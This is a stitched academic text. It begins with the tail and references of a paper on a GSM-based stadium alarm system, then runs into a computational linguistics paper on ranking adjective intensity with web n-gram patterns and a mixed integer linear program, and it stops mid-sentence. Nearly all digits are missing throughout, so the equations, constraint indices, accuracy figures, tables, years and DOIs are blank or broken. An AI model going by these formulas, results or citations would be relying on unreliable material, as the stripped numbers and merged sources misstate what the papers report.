send, the led turns on. when sending “close” command the led turns off. it proved the gsm module could receive short message successfully. the test result is shown in figure . figure . gsm receiving sms v. conclusions in this paper, the multi-function alarm system could detect the smoke or combustible gas, the infrared identification and the temperature by the multi-point sensor in the large stadium. the collected data transmitted by the mobile communication to the mobile phone or the main platform. the system is simple and cheap, it has various functions for the monitoring system conveniently. acknowledgment this work was partly supported by shaanxi province social science fund project (no. r ) of china and by the scientific research fund project of shaanxi provincial department of education ( jk ). references [ ] f.cappella, v.caracciolo, and r.cerulli, et al. “the calibration and the monitoring/alarm system”, international journal of modern physics a, vol. , nov. , pp. - , doi:org/ . /s x [ ] t.hamaguchi, h.sakashita, and h.moritani, et al. “method for designing alarm system using daes, ce matrices, and preference indices”, journal of chemical engineering of japan, vol. , jun, , pp. - , doi:org/ . /jcej. we [ ] s.romero-brufau, b. w.morlan, and m.johnson, et al. “evaluating automated rules for rapid response system alarm triggers in medical and surgical patients”, journal of hospital medicine, vol. , nov. , pp. - ,doi: . /jhm. . [ ] y.jie, h.zhu, and x.cao. “one-piece triboelectric nanosensor for self-triggered alarm system and latent fingerprint detection”, acs nano, vol. , oct. , pp. - , doi: . /acsnano. b . [ ] y.jiang, g.li, and j.wang . “photoacoustic compound fire alarm system for detecting particles and carbon monoxide in smoke”, fire technology, vol. ,may. , pp. - , doi:org/ . /s - - - . [ ] s.fong, r.wong, and a. v.vasilakos. “accelerated pso swarm search feature selection for data stream mining big data”, ieee transactions on services computing, vol. , dec. , pp. - , doi: . /tsc. . . [ ] a. o.gaca, p.kudrin, and c.colomer-winter, et al. “from (p)ppgpp to (pp)pgpp: characterization of regulatory effects of pgpp synthesized by the small alarmone synthetase of enterococcus faecalis”, journal of bacteriology, vol. , oct. , pp. .doi: . /jb. - . [ ] t.jones, l.glass, and s.gandhi, et al. “madagascar's mangroves: quantifying nation-wide and ecosystem specific dynamics, and detailed contemporary mapping of distinct ecosystems”, remote sensing, vol. ,feb. , pp. ,doi: . /rs . [ ] a. s.crunchant, m.egerer, and a.loos, et al. “automated face detection for occurrence and occupancy estimation in chimpanzees”, american journal of primatology, vol. ,may. , pp. - .doi: . /ajp. . https://doi.org/ . /s x https://doi.org/ . /jcej. we https://doi.org/ . /acsnano. b https://doi.org/ . /tsc. . http://dx.doi.org/ . /jb. - http://dx.doi.org/ . /rs http://dx.doi.org/ . /ajp. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. good, great, excellent: global inference of semantic intensities gerard de melo icsi, berkeley demelo@icsi.berkeley.edu mohit bansal cs division, uc berkeley mbansal@cs.berkeley.edu abstract adjectives like good, great, and excellent are similar in meaning, but differ in intensity. in- tensity order information is very useful for language learners as well as in several nlp tasks, but is missing in most lexical resources (dictionaries, wordnet, and thesauri). in this paper, we present a primarily unsupervised approach that uses semantics from web-scale data (e.g., phrases like good but not excel- lent) to rank words by assigning them posi- tions on a continuous scale. we rely on mixed integer linear programming to jointly deter- mine the ranks, such that individual decisions benefit from global information. when rank- ing english adjectives, our global algorithm achieves substantial improvements over pre- vious work on both pairwise and rank corre- lation metrics (specifically, % pairwise ac- curacy as compared to only % by previous work). moreover, our approach can incorpo- rate external synonymy information (increas- ing its pairwise accuracy to %) and extends easily to new languages. we also make our code and data freely available. introduction current lexical resources such as dictionaries and thesauri do not provide information about the in- tensity order of words. for example, both wordnet (miller, ) and roget’s st century thesaurus (thesaurus.com) present acceptable, great, and su- perb as synonyms of the adjective good. however, a native speaker knows that these words represent varying intensity and can in fact generally be ranked by intensity as acceptable < good < great < superb. similarly, warm < hot < scorching are identified as synonyms in these resources. ranking information, http://demelo.org/gdm/intensity/ however, is crucial because it allows us to differen- tiate e.g. between various intensities of an emotion, and is hence very useful for humans when learning a language or judging product reviews, as well as for automatic text understanding and generation tasks such as sentiment and subjectivity analysis, recog- nizing textual entailment, question answering, sum- marization, and coreference and discourse analysis. in this work, we attempt to automatically rank sets of related words by intensity, focusing in par- ticular on adjectives. this is made possible by the vast amounts of world knowledge that are now avail- able. we use lexico-semantic information extracted from a web-scale corpus in conjunction with an al- gorithm based on a mixed integer linear program (milp). linguistic analyses have identified phrases such as good but not great or hot and almost scorch- ing in a text corpus as sources of evidence about the relative intensities of words. however, pure infor- mation extraction approaches often fail to provide enough coverage for real-world downstream appli- cations (tandon and de melo, ), unless some form of advanced inference is used (snow et al., ; suchanek et al., ). in our work, we address this sparsity problem by relying on web-scale data and using an milp model that extends the pairwise scores to a more com- plete joint ranking of words on a continuous scale, while maintaining global constraints such as transi- tivity and giving more weight to the order of word pairs with higher corpus evidence scores. instead of considering intensity ranking as a pairwise deci- sion process, we thus exploit the fact that individual decisions may benefit from global information, e.g. about how two words relate to some third word. previous work (sheinman and tokunaga, ; schulam and fellbaum, ; sheinman et al., ) has also used lexico-semantic patterns to or- der adjectives. they mainly evaluate their algorithm on a set of pairwise decisions, but also present a par- titioning approach that attempts to form scales by placing each adjective to the left or right of pivot words. unfortunately, this approach often fails be- cause many pairs lack order-based evidence even on the web, as explained in more detail in section . in contrast, our milp jointly uses information from all relevant word pairs and captures com- plex interactions and inferences to produce inten- sity scales. we can thus obtain an order between two adjectives even when there is no explicit evi- dence in the corpus (using evidence for related pairs and transitive inference). our global milp is flex- ible and can also incorporate additional synonymy information if available (which helps the milp find an even better ranking solution). our approach also extends easily to new languages. we describe two approaches for this multilingual extension: pattern projection and cross-lingual milps. we evaluate our predicted intensity rankings us- ing both pairwise classification accuracy and rank- ing correlation coefficients, achieving strong results, significantly better than the previous approach by sheinman & tokunaga ( % relative error reduc- tion) and quite close to human-level performance. method in this section, we describe each step of our ap- proach to ordering adjectives on a single, relative scale. our method can also be applied to other word classes and to languages other than english. . web-based scoring model . . intensity scales near-synonyms may differ in intensity, e.g. joy vs. euphoria, or drizzle vs. rain. this is particu- larly true of adjectives, which can represent different degrees of a given quality or attribute such as size or age. many adjectives are gradable and thus al- low for grading adverbial modifiers to express such intensity degrees, e.g., a house can be very big or extremely big. often, however, completely differ- ent adjectives refer to varying degrees on the same scale, e.g., huge, gigantic, gargantuan. even adjec- tives like enormous (or superb, impossible) that are considered non-gradable from a syntactic perspec- tive can be placed on a such a scale. weak-strong patterns strong-weak patterns ? (,) but not ? not ? (,) just ? ? (,) if not ? not ? (,) but just ? ? (,) although not ? not ? (,) still ? ? (,) though not ? not ? (,) but still ? ? (,) (and/or) even ? not ? (,) although still ? ? (,) (and/or) almost ? not ? (,) though still ? not only ? but ? ? (,) or very ? not just ? but ? table : ranking patterns used in this work. among the patterns represented by the regular expressions above, we use only those that capture less than or equal to five words (to fit in the google n-grams, see section . . ). articles (a, an, the) are allowed to appear before the wildcards wherever possible. . . intensity patterns linguistic studies have found lexical patterns like ‘? but not ?’ (e.g. good but not great) to reveal order information between a pair of adjectives (sheinman and tokunaga, ). we assume that we have two sets of lexical patterns that allow us to infer the most likely ordering between two words when encoun- tered in a corpus. a first pattern set, pws, contains patterns that reflect a weak-strong order between a pair of word (the first word is weaker than the sec- ond), and a second pattern set, psw, captures the strong-weak order. see table for the adjective pat- terns that we used in this work (and see section . for implementation details regarding our pattern col- lection). many of these patterns also apply to other parts of speech (e.g. ‘drizzle but not rain’, ‘running or even sprinting’), with significant discrimination on the web in the right direction. . . pairwise scores given an input set of words to be placed on a scale, we first collect evidence of their intensity or- der by using the above-mentioned intensity patterns and a large, web-scale text corpus. previous work on information extraction from limited-sized raw text corpora revealed that cover- age is often limited (hearst, ; hatzivassiloglou and mckeown, ). some studies (chklovski and pantel, ; sheinman and tokunaga, ) used hit counts from an online search engine, but this is unstable and irreproducible (kilgarriff, ). to avoid these issues, we use the largest available (good, great) (great, good) (small, minute) good , but not great → . not great , just good → . small , almost minute → . good , if not great → . great or very good → . small , even minute → . good , though not great → . not great but still good → . good , or even great → . not just good but great → . good , almost great → . table : some examples from the web-scale corpus of useful intensity-based phrases on adjective pairs. static corpus of counts, the google n-grams corpus (brants and franz, ), which contains english n-grams (n = to ) and their observed frequency counts, generated from nearly trillion word tokens and billion sentences. we consider each pair of words (a ,a ) in the in- put set in turn. for each pattern p in the two pattern sets (weak-strong pws and strong-weak psw), we in- sert the word pair into the pattern as p(a ,a ) to get a phrasal query like “big but not huge”. this is done by replacing the two wildcards in the pattern by the two words in order. finally, we scan the web n- grams corpus in a batch approach similar to bansal and klein ( ) and collect frequencies of all our phrase queries. table depicts some examples of useful intensity-based phrase queries and their fre- quencies in the web-scale corpus. we also collect frequencies for the input word unigrams and the pat- terns for normalization purposes. given a word pair (a ,a ) and a corpus count function cnt, we define w = p ∑ p ∈pws cnt(p (a ,a )) s = p ∑ p ∈psw cnt(p (a ,a )) w = p ∑ p ∈pws cnt(p (a ,a )) s = p ∑ p ∈psw cnt(p (a ,a )) ( ) with p = ∑ p ∈pws cnt(p ) p = ∑ p ∈psw cnt(p ), ( ) such that the final overall weak-strong score is score(a ,a ) = (w −s ) − (w −s ) cnt(a ) · cnt(a ) . ( ) here w and s represent web evidence of a and a being in the weak-strong and strong-weak relation, respectively. w and s fit the reverse pair (a ,a ) in the patterns and hence represent the strong-weak and weak-strong relations, respec- tively, in the opposite direction. hence, overall, (w −s ) − (w −s ) represents the total weak- strong score of the pair (a ,a ), i.e. the score of a being on the left of a on a relative intensity scale, such that score(a ,a ) = −score(a ,a ). the raw frequencies in the score are divided by counts of the patterns and by individual word unigram counts to obtain a pointwise mutual information (pmi) style normalization and hence avoid any bias in the score due to high-frequency patterns or word unigrams. . global ordering with an milp . . objective and constraints given pairwise scores, we now aim at producing a global ranking of the input words that is much more informative than the original pairwise scores. joint inference from multiple word pairs allows us to ben- efit from global information: due to the sparsity of the pattern evidence, determining how two adjec- tives relate to each other can sometimes e.g. only be inferred by observing how each of them relate to some third adjective. we assume that we are given n input words a = a , . . . ,an that we wish to place on a linear scale, say [ , ]. thus each word ai is to be assigned a position xi ∈ [ , ] based on the pairwise weak- strong weights score(ai,aj). a positive value for in preliminary experiments on a development set, we also evaluated other intuitive forms of normalization. figure : the input weak-strong data may contain one or more cycles, e.g. due to noisy patterns, so the final ranking will have to choose which input scores to honor and which to remove. score(ai,aj) means that ai is supposedly weaker than aj and hence we would like to obtain xi < xj. a negative value for score(ai,aj) means that ai is assumed to be stronger than aj, so we would want to obtain xi > xj. therefore, intuitively, our goal corresponds to maximizing the objective ∑ i,j sgn(xj −xi) ·score(ai,aj) ( ) note that it is important to use the signum func- tion sgn() here, because we only care about the rel- ative order of xi and xj. maximizing ∑ ij(xj −xi) · score(ai,aj) would lead to all words being placed at the edges of the scale, because the highest scores would dominate over all other ones. we do include the score magnitudes in the objective, because they help resolve contradictions in the pairwise scores (e.g., see figure ). this is discussed in more de- tail in section . . . in order to maximize this non-differentiable ob- jective, we use mixed integer linear programming (milp), a variant of linear programming in which some but not all of the variables are constrained to be integers. using an milp formalization, we can find a globally optimal solution in the joint deci- sion space, and unlike previous work, we jointly ex- ploit global information rather than just individual local (pairwise) scores. to encode the objective in a milp, we need to introduce additional variables dij, wij, sij to capture the effect of the signum function, as explained below. we additionally also enable our milp to make use of any external equivalence (synonymy) infor- mation e ⊆ { , . . . ,n}×{ , . . . ,n} that may be available. in this context, two words are considered synonymous if they are close enough in meaning to be placed on (almost) the same position in the inten- sity scale. if (i,j) ∈ e, we can safely assume that ai, aj have near-equivalent intensity, so we should encourage xi, xj to remain close to each other. the milp is defined as follows: maximize∑ (i,j) ∈e (wij −sij) ·score(ai,aj) − ∑ (i,j)∈e (wij + sij) c subject to dij = xj −xi ∀i,j ∈{ , . . . ,n} dij −wijc ≤ ∀i,j ∈{ , . . . ,n} dij + ( −wij)c > ∀i,j ∈{ , . . . ,n} dij + sijc ≥ ∀i,j ∈{ , . . . ,n} dij − ( −sij)c < ∀i,j ∈{ , . . . ,n} xi ∈ [ , ] ∀i ∈{ , . . . ,n} wij ∈{ , } ∀i,j ∈{ , . . . ,n} sij ∈{ , } ∀i,j ∈{ , . . . ,n} the difference variables dij simply capture differ- ences between xi, xj. c is any very large constant greater than ∑ i,j |score(ai,aj)|; the exact value is irrelevant. the indicator variables wij and sij are jointly used to determine the value of the signum function sgn(dij) = sgn(xj − xi). variables wij become if and only if dij > and hence serve as indicator variables for weak-strong relationships in the output. variables sij become if and only if dij < and hence serve as indicator variables for a strong-weak relationship in the output. the ob- jective encourages wij = for score(ai,aj) > and sij = for score(ai,aj) < . when equiva- lence (synonymy) information is available, then for (i,j) ∈ e both sij = and wij = are encouraged. . . discussion our milp uses intensity evidence of all input pairs together and assimilates all the scores via global transitivity constraints to determine the posi- tions of the input words on a continuous real-valued scale. hence, our approach addresses drawbacks in order to avoid numeric instability issues due to very small score(ai, aj) values after frequency normalization, in practice we have found it necessary to rescale them by a fac- tor of over the smallest |score(ai, aj)| > . figure : equivalence information: knowing that am, a are synonyms gives the milp an indication of where to place an on the scale with respect to a , a , a of local or divide-and-conquer approaches, where adjectives are scored with respect to selected pivot words, and hence many adjectives that lack pairwise evidence with the pivots are not properly classified, although they may have order evidence with some third adjective that could help establish the ranking. optional synonymy information can further help, as shown in figure . moreover, our milp also gives higher weight to pairs with higher scores, which is useful when breaking global constraint cycles as in the simple example in figure . if we need to break a con- straint violating triangle or cycle, we would have to make arbitrary choices if we were ranking based on sgn(score(a,b)) alone. instead, we can choose a better ranking based on the magnitude of the pair- wise scores. a stronger score between an adjective pair doesn’t necessarily mean that they should be further apart in the ranking. it means that these two words are attested together on the web with respect to the intensity patterns more than with other candi- date words. therefore, we try to respect the order of such word pairs more in the final ranking when we are breaking constraint-violating cycles. related work hatzivassiloglou and mckeown ( ) presented the first step towards automatic identification of ad- jective scales, thoroughly discussing the background of adjective semantics and a means of discovering clusters of adjectives that belong on the same scale, thus providing one way of creating the input for our ranking algorithm. inkpen and hirst ( ) study near-synonyms and nuances of meaning differentiation (such as stylistic, attitudinal, etc.). they attempt to automatically ac- quire a knowledge base of near-synonym differences via an unsupervised decision-list algorithm. how- ever, their method depends on a special dictionary of synonym differences to learn the extraction pat- terns, while we use only a raw web-scale corpus. mohammad et al. ( ) proposed a method of identifying whether two adjectives are antonymous. this problem is related but distinct, because the de- gree of antonymy does not necessarily determine their position on an intensity scale. antonyms (e.g., little, big) are not necessarily on the extreme ends of scales. sheinman and tokunaga ( ) and sheinman et al. ( ) present the most closely related previous work on adjective intensities. they collect lexico- semantic patterns via bootstrapping from seed adjec- tive pairs to obtain pairwise intensities, albeit using search engine ‘hits’, which are unstable and prob- lematic (kilgarriff, ). while their approach is primarily evaluated in terms of a local pairwise classification task, they also suggest the possibil- ity of ordering adjectives on a scale using a pivot- based partitioning approach. although intuitive in theory, the extracted pairwise scores are frequently too sparse for this to work. thus, many adjec- tives have no score with a particular headword. in our experiments, we reimplemented this approach and show that our milp method improves over it by allowing individual pairwise decisions to benefit more from global information. schulam and fell- baum ( ) apply the approach of sheinman and tokunaga ( ) to german adjectives. our method extends easily to various foreign languages as de- scribed in section . another related task is the extraction of lexico- syntactic and lexico-semantic intensity-order pat- terns from large text corpora (hearst, ; chklovski and pantel, ; tandon and de melo, ). sheinman and tokunaga ( ) follows davidov and rappoport ( ) to automatically bootstrap adjective scaling patterns using seed ad- jectives and web hits. these methods thus can be used to provide the input patterns for our algorithm. verbocean by chklovski and pantel ( ) ex- tracts various fine-grained semantic relations (in- cluding the stronger-than relation) between pairs of verbs, using lexico-syntactic patterns over the web. our approach of jointly ranking a set of words using pairwise evidence is also applicable to the verbo- cean pairs, and should help address similar sparsity issues of local pairwise decisions. such scales will again be quite useful for language learners and lan- guage understanding tools. de marneffe et al. ( ) infer yes-or-no answers to questions with responses involving scalar adjec- tives in a dialogue corpus. they correlate adjectives with ratings in a movie review corpus to find that good appears in lower-rated reviews than excellent. finally, there has been a lot of work on measuring the general sentiment polarity of words (hatzivas- siloglou and mckeown, ; hatzivassiloglou and wiebe, ; turney and littman, ; liu and seneff, ; taboada et al., ; yessenalina and cardie, ; pang and lee, ). our work in- stead aims at producing a large, unrestricted number of individual intensity scales for different qualities and hence can help in fine-grained sentiment analy- sis with respect to very particular content aspects. experiments . data input clusters in order to obtain input clusters for evaluation, we started out with the satellite cluster or ‘dumbbell’ structure of adjectives in wordnet . , which consists of two direct antonyms as the poles and a number of other satellite adjectives that are se- mantically similar to each of the poles (gross and miller, ). for each antonymy pair, we deter- mined an extended dumbbell set by looking up syn- onyms and words in related (satellite adjective and ‘see-also’) synonym sets. we cut such an extended dumbbell into two antonymous halves and treated each of these halves as a potential input adjective cluster. most of these wordnet clusters are noisy for the purpose of our task, i.e. they contain adjectives that appear unrelatable on a single scale due to polysemy and semantic drift, e.g. violent with respect to super- natural and affected. motivated by sheinman and tokunaga ( ), we split such hard-to-relate ad- jectives into smaller scale-specific subgroups using the corpus evidence . for this, we consider an undi- note that we do not use the wordnet dataset of sheinman and tokunaga ( ) for evaluation, as it does not provide full - - # of c ha in s length of chain figure : the histogram of cluster sizes after partitioning. # of c ha in s length of chain figure : the histogram of cluster sizes in the test set. rected edge between each pair of adjectives that has a non-zero intensity score (based on the web-scale scoring procedure described in section . . ). the resulting graph is then partitioned into connected components such that any adjectives in a subgraph are at least indirectly connected via some path and thus much more likely to belong to the same inten- sity scale. while this does break up partitions when- ever there is no corpus evidence connecting them, ordering the adjectives within each such partition re- mains a challenging task. this is because the web evidence will still not necessarily directly relate all adjectives (in a partition) to each other. addition- ally, the web evidence may still indicate the wrong direction. figure shows the size distribution of the resulting partitions. patterns to construct our intensity pattern set, we started with a couple of common rankable adjective seed pairs such as (good, great) and (hot, boiling) and used the web-scale n-grams corpus (brants and franz, ) to collect the few most frequent pat- terns between and around these seed-pairs (in both directions). among these, we manually chose a scales. instead, their annotators only made pairwise compar- isons with select words, using a -way classification scheme (neutral, mild, very mild, intense, very intense). small set of intuitive patterns that are linguistically useful for ordering adjectives, several of which had not been discovered in previous work. these are shown in table . note that we only collected pat- terns that were not ambiguous in the two orders, for example the pattern ’? , not ?’ is ambiguous be- cause it can be used as both ’good, not great’ and ’great, not good’. alternatively, one can easily also use fully-automatic bootstrapping techniques based on seed word pairs (hearst, ; chklovski and pantel, ; yang and su, ; turney, ; davidov and rappoport, ). however, our semi- automatic approach is a simple and fast process that extracts a small set of high-quality and very gen- eral adjective-scaling patterns. this process can quickly be repeated from scratch in any other lan- guage. moreover, as described in section . , the english patterns can also be projected automatically to patterns in other languages. development and test sets section . describes the method for collecting the intensity scores for ad- jective pairs, using web-scale n-grams (brants and franz, ). we relied on a small development set to test the milp structure and the pairwise score setup. for this, we manually chose representative adjective clusters from the full set of clusters. the final test set, distinct from this development set, consists of word pairs in clusters, each annotated by two native speakers of english. both the gold test data (and our code) are freely avail- able. to arrive at this data, we randomly drew clusters each for cluster sizes , , and + from the histogram of partitioned adjective clusters in fig- ure . while labeling a cluster, annotators could ex- clude words that they deemed unsuitable to fit on a single shared intensity scale with the rest of the cluster. fortunately, the partitioning described ear- lier had already separated most such cases into dis- tinct clusters. the annotators ordered the remaining words on a scale. words that seemed indistinguish- able in strength could share positions in their anno- tation. as our goal is to compare scale formation algo- rithms, we did not include trivial clusters of size . on such trivial clusters, the web evidence alone de- termines the output and hence all algorithms, includ- http://demelo.org/gdm/intensity/ ing the baseline, obtain the same pairwise accuracy (defined below) of . % on a separate set of ran- dom clusters of size . figure shows the distribution of cluster sizes in our main gold set. the inter-annotator agreement in terms of cohen’s κ (cohen, ) on the pairwise classification task with labels (weaker, stronger, or equal/unknown) was . . in terms of pairwise accuracy, the agreement was . %. . metrics in order to thoroughly evaluate the performance of our adjective ordering procedure, we rely on both pairwise and ranking-correlation evaluation metrics. consider a set of input words a = {a ,a , . . . ,an} and two rankings for this set – a gold-standard rank- ing rg(a) and a predicted ranking rp (a). . . pairwise accuracy for a pair of words ai, aj, we may consider the classification task of choosing one of three labels (<, >, =?) for the case of ai being weaker, stronger, and equal (or unknown) in intensity, respectively, com- pared to a : l(a ,a ) =    < if r(ai) < r(aj) > if r(ai) > r(aj) =? if r(ai) = r(aj) for each pair (a ,a ), we compute gold-standard labels lg(a ,a ) and predicted labels lp (a ,a ) as above, and then the pairwise accuracy pw(a) for a particular ordering on a is simply the fraction of pairs that are correctly classified, i.e. for which the predicted label is same as the gold-standard label: pw(a) = ∑ i<j {lg(ai,aj) = lp (ai,aj)} ∑ i<j . . ranking correlation coefficients our second type of evaluation assesses the rank correlation between two ranking permutations (gold-standard and predicted). many studies use kendall’s tau (kendall, ), which measures the total number of pairwise inversions, while others prefer spearman’s rho (spearman, ), which measures the l distance between ranks. kendall’s tau correlation coefficient we use the τb version of kendall’s correlation metric, as it in- corporates a correction for ties (kruskal, ; dou et al., ): τb = p −q√ (p + q + x ) · (p + q + y ) where p is the number of concordant pairs, q is the number of discordant pairs, x is the number of pairs tied in the first ranking, y is the number of pairs tied in the second ranking. given the two rank- ings of an adjective set a, the gold-standard ranking rg(a) and the predicted ranking rp (a), two words ai, aj are: • concordant iff both rankings have the same strict order of the two elements, i.e., rg(ai) > rg(aj) and rp (ai) > rp (aj), or rg(ai) < rg(aj) and rp (ai) < rp (aj). • discordant iff the two rankings have an inverted strict order of the two elements, i.e., rg(ai) > rg(aj) and rp (ai) < rp (aj), or rg(ai) < rg(aj) and rp (ai) > rp (aj). • tied iff rg(ai) = rg(aj) or rp (ai) = rp (aj). spearman’s rho correlation coefficient for two n-sized ranked lists {xi} and {yi}, the spearman correlation coefficient is defined as the pearson cor- relation coefficient between the ranks of variables: ρ = ∑ i (xi − x̄) · (yi − ȳ) √∑ i (xi − x̄) · ∑ i (yi − ȳ) here, x̄ and ȳ denote the means of the values in the respective lists. we use the standard procedure for handling ties correctly. tied values are assigned the average of all ranks of items sharing the same value in the ranked list sorted in ascending order of the values. handling inversions while annotating, we some- times observed that the ordering itself was very clear but the annotators disagreed about which end of a particular scale was to count as the strong one, e.g. when transitioning from soft to hard or from alpha to beta. we thus also report average absolute values of both correlation coefficients, as these properly ac- count for anticorrelations. our test set only contains clusters of size or larger, so there is no need to account for inversions in clusters of size . . results in table , we use the evaluation metrics mentioned above to compare several different approaches. web baseline the first baseline simply reflects the original pairwise web-based intensity scores. we classify (with one of labels) a given pair of adjectives using the web-based intensity scores (as described in section . . ) as follows: lbaseline(a ,a ) =    < if score(ai,aj) > > if score(ai,aj) < =? if score(ai,aj) = since score(ai,aj) represents the weak-strong score of the two adjectives, a more positive value means a higher likelihood of ai being weaker (<, on the left) in intensity than aj. in table , we observe that the (micro-averaged) pairwise accuracy, as defined earlier, for the origi- nal web baseline is . %, while the ranking mea- sures are undefined because the individual pairs do not lead to a coherent scale. divide-and-conquer the divide-and-conquer baseline recursively splits a set of words into three subgroups, placed to the left (weaker), on the same position (no evidence), or to the right (stronger) of a given randomly chosen pivot word. while this approach shows only a minor improve- ment in terms of the pairwise accuracy ( . %), its main benefit is that one obtains well-defined inten- sity scales rather than just a collection of pairwise scores. sheinman and tokunaga the approach by sheinman and tokunaga ( ) involves a simi- lar divide-and-conquer based partitioning in the first phase, except that their method makes use of syn- onymy information from wordnet and uses all syn- onyms in wordnet’s synset for the headword as neutral pivot elements (if the headword is not in wordnet, then the word with the maximal unigram frequency is chosen). in the second phase, their method performs pairwise comparisons within the more intense and less intense subgroups. we reim- plement their approach here, using the google n- grams dataset instead of online web search engine hits. we observe a small improvement over the web baseline in terms of pairwise accuracy. note that the method pairwise accuracy avg. τ avg. |τ| avg. ρ avg. |ρ| web baseline . % n/a n/a n/a n/a divide-and-conquer . % . . . . sheinman and tokunaga ( ) . % n/a n/a n/a n/a milp . % . . . . milp with synonymy . % . . . . inter-annotator agreement . % . . . . table : main test results predicted class weaker tie stronger true class weaker tie stronger table : confusion matrix (web baseline) rank correlation measure scores are undefined for their approach. this is because in some cases their method placed all words on the same position in the scale, which these measures cannot handle even in their tie-corrected versions. overall, the sheinman and tokunaga approach does not aggregate informa- tion sufficiently well at the global level and often fails to make use of transitive inference. milp our milp exploits the same pairwise scores to induce significantly more accurate pair- wise labels with . % accuracy, a % relative error reduction over the web baseline, % over divide-and-conquer, and % over sheinman and tokunaga ( ). we further see that our milp method is able to exploit external synonymy (equiv- alence) information (using synonyms marked by the annotators). the accuracy of the pairwise scores as well as the quality of the overall ranking increase even further to . %, approaching the human inter- annotator agreement. in terms of average correlation coefficients, we observe similar improvement trends from the milp, but of different magnitudes, because these averages give small clusters the same weight as larger ones. . analysis confusion matrices for a given approach, we can study the confusion matrix obtained by cross- tabulating the gold classification with the predicted predicted class weaker tie stronger true class weaker tie stronger table : confusion matrix (milp) classification of every unique pair of adjectives in the ground truth data. table shows the confusion matrix for the web baseline. we observe that due to the sparsity of pairwise intensity order evidence, the baseline method predicts too many ties. table provides the confusion matrix for the milp (without external equivalence information) for comparison. although the middle column still shows that the milp predicts more ties than humans annotators, we find that a clear majority of all unique pairs are now correctly placed along the diagonal. this confirms that our milp successfully infers new ordering decisions, although it uses the same input (corpus evidence) as the baseline. the remaining ties are mostly just the result of pairs for which there simply is no evidence at all in the input web counts. note that this problem could for instance be circum- vented by relying on a crowdsourcing approach: a few dispersed tie-breakers are enough to allow our milp to correct many other predictions. predicted examples finally, in table , we pro- vide a selection of real results obtained by our algo- rithm. for instance, it correctly inferred that terri- fying is more intense than creepy or scary, although the web pattern counts did not provide any explicit information about these words pairs. in some cases, however, the web evidence did not suffice to draw the right conclusions, or it was misleading due to is- sues like polysemy (as for the word funny). accuracy prediction gold standard good hard < painful < hopeless hard < painful < hopeless full < stuffed < (overflowing, overloaded) full < stuffed < overflowing < overloaded unusual < uncommon < rare < exceptional < extraordinary uncommon < unusual < rare < extraordinary < exceptional average creepy < scary < sinister < frightening < terrifying creepy < (scary, frightening) < terrifying < sinister bad (awake, conscious) < alive < aware alive < awake < (aware, conscious) strange < (unusual, weird) < (funny, eerie) (strange, funny) < unusual < weird < eerie table : some examples (of bad, average and good accu- racy) of our milp predictions (without synonymy infor- mation) and the corresponding gold-standard annotation. while we show results on gold-standard chains here for evaluation purposes, in practice one can also recombine two [ , ] chains for a pair of antonymic clusters to form a single scale from [− , ] that visu- alizes the full spectrum of available adjectives along a dimension, from adjacent all the way to removed, or from black to glaring. extension to multilingual ordering our method for globally ordering words on a scale can easily be applied to languages other than en- glish. the entire process is language-independent as long as the required resources are available and a small number of patterns are chosen. for morpho- logically rich languages, the information extraction step of course may require additional morphologi- cal analysis tools for stemming and aggregating fre- quencies across different forms. alternatively, a cross-lingual projection approach is possible at multiple levels, utilizing information from the english data and ranking. as the first step, the set of words in the target language that we wish to rank can be projected from the english word set if necessary – e.g., as shown in de melo and weikum ( ). next, we outline two projection methods for the ordering step. the first method is based on pro- jection of the english intensity-ordering patterns to the new language, and then using the same milp as described in section . . in the second method, we also change the milp and add cross-lingual con- straints to better inform the target language’s ad- jective ranking. a detailed empirical evaluation of these approaches remains future work. . cross-lingual pattern projection instead of creating new patterns, in many cases we obtain quite adequate intensity patterns by us- ing cross-lingual projection. we simply take sev- eral adjective pairs, instantiate the english patterns with them, and obtain new patterns using a machine translation system. filling the wildcards in a pat- tern, say ‘? but not ?’, with good/excellent results in ‘good but not excellent’. this phrase is then trans- lated into the target language using the translation system, say into german ‘gut aber nicht ausgezeich- net’. finally, put back the wildcards in the place of the translations of the adjective words, here gut and ausgezeichnet, to get the corresponding german pat- tern ‘? aber nicht ?’. table shows various german intensity patterns that we obtain by projecting from the english patterns as described. the process is re- peated with multiple adjective pairs in case different variants are returned, e.g. due to morphology. most of these translations deliver useful results. now that we have the target language adjectives and the ranking patterns, we can compute the pair- wise intensity scores using large-scale data in that language. we can use the google n-grams cor- pora for european languages (brants and franz, ), and also for chinese (ldc t ) and japanese (ldc t ). for other languages, one can use available large raw-text corpora or web crawling tools. . crosslingual milp to improve the rankings for lesser-resourced lan- guages, we can further use a joint milp approach for the new language we want to transfer this pro- cess to. additional constraints between the english weak-strong patterns strong-weak patterns english german english german ? but not ? ? aber nicht ? not ? just ? nicht ? gerade ? ? if not ? ? wenn nicht ? not ? but just ? nicht ? aber nur ? ? and almost ? ? und fast ? not ? though still ? nicht ? aber immer noch ? not just ? but ? nicht nur ? sondern ? ? or very ? ? oder sehr ? table : examples of german intensity patterns projected (translated) directly from the english patterns. words and their corresponding target language trans- lations, in combination with the english ranking in- formation, allow the algorithm to obtain better rank- ings for the target words whenever the non-english target language corpus does not provide sufficient intensity order evidence. in this case, the input set a contains words in multiple languages. the web intensity scores score(ai,aj) should be set to zero when comparing words across languages. we instead link them using a translation table t ⊆ { , . . . ,n} × { , . . . ,n} from a translation dictionary or phrase table. here, (i,j) ∈ t signifies that ai is a translation of aj. we do not require a bijective relationship between them (i.e., translations needn’t be unique). the objective function is augmented by adding the new term ∑ (i,j)∈t (w′ij + s ′ ij)ct ( ) for a constant ct > that determines how much weight we assign to translations as opposed to the corpus count scores. the milp is extended by adding the following extra constraints. dij −w′ijct < −dmax ∀i,j ∈{ , . . . ,n} dij + ( −w′ij)ct ≥−dmax ∀i,j ∈{ , . . . ,n} dij + s ′ ijct > dmax ∀i,j ∈{ , . . . ,n} dij − ( −s′ij)ct ≤ dmax ∀i,j ∈{ , . . . ,n} w′ij ∈{ , } ∀i,j ∈ t s′ij ∈{ , } ∀i,j ∈ t the variables di,j, as before, encode distances be- tween positions of words on the scale, but now also include cross-lingual pairs of words in different lan- guages. the new constraints encourage translational equivalents to remain close to each other, preferably within a desired (but not strictly enforced) maximum distance dmax. the new variables w′ij, s ′ ij are sim- ilar to wij, sij in the standard milp. however, the w′ij become if and only if dij ≥−dmax and the s′ij become if and only if dij ≤ dmax. if both w′ij and s′ij are , then the two words have a small distance −dmax ≤ dij ≤ dmax. the augmented objective function explicitly encourages this for translational equivalents. overall, this approach thus allows evi- dence from a language 